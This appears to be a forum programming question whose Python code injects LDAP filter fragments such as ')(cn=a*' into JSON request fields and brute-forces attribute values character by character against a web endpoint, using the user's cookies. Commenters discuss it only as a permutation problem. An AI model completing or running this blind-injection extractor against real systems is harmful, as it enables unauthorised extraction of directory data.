# how to generate all permutations and loop over them for X conditions until no char remains?

Tags: python, python-3.x, for-loop, permutation

I would like to generate all permutations of chars ( of every char in alphabet variable ) and, under a certain match ( if the http response contains the string in resout variable ), add them to another string inside a loop

the code:

```
def nth_repl(s, sub, repl, n):
find = s.find(sub)
# If find is not -1 we have found at least one match for the substring
i = find != -1
# loop util we find the nth or we find no match
while find != -1 and i != n:
    # find + 1 means we start searching from after the last match
    find = s.find(sub, find + 1)
    i += 1
# If i is equal to n we found nth match so replace
if i == n:
    return s[:find] + repl + s[find+len(sub):]
return s

[....]
resout = input("#string to search:" )
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"%=^[]:;"
attributes = ["c", "cn", "co" ]
rawcoo = input("cookies:")

inp = input("http body:") #{"name" : "pippo$","age" : "36$","rights" : [ "pippo", "editor$", "contributor" ]}
cookie = SimpleCookie()
cookie.load(rawcoo)
cookies = {}
for key, morsel in cookie.items():
    cookies[key] = morsel.value    

for n in range(1, inp.count('$')+1):
    for attribute in attributes:
        initdata = nth_repl(inp, "$", f')({attribute}=*',n)
        data = initdata.replace("$", "")
        print(data)
        value = ""

        r = requests.post(url, data=data, cookies=cookies)
        if resout in r.text:

            
            for char in alphabet:               
                query = nth_repl(inp, "$", f")({attribute}={value}{char}*",n)
                boo = query.replace("$", "")
                #print(boo)


                r2 = requests.post(url, data=boo, cookies=cookies)
            
                if resout in r2.text:
                    print("value: " + boo )
```

actual result:

```
{"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(c=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[..] and so on
```

what I would like to achieve is:

```
{"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(c=z*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
```

if a match ( for example ")(cn=c*" ) has been found :

```
{"name" : "pippo)(cn=ca*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=cb*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=c2*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
```

when all the chars has ended and no more match has been found, restart the initial loop from where it stopped, so ( it was "cn=c" so the next is "cn=d"):

```
{"name" : "pippo)(cn=d*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=e*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[..]
```

and again if another match or more ( for example ")(cn=z*" and ")(cn=Z0mb*" ) has been found:

```
{"name" : "pippo)(cn=za*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=zb*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=Z0mba*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=Z0mbi*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
```

until all chars in alphabet and attributes are used and print all matches

Comment: You probably want to look at itertools to generate permutations but it quickly gets expensive ! What is the actual problem you are trying to solve ?

Comment: @Inspi thanks for your interest in helping me!
the problem I'm trying to solve is how to achieve the behavior I explained under "what I would like to achieve is:" part. I made some examples of the results I would like to get, just to make it easier to understand

Comment: I think we may have a case of XY problem here https://xyproblem.info/
I'm asking for a higher description of the problem because there are **3 TRILLIONS** permutations of 8 characters taken in an alphabet of 40, and this is very expensive to compute. By describing the root problem correctly it's possible that a solution that is way faster than this can be found. It seems you are trying to match certain patterns so maybe a simple regex is the answer here.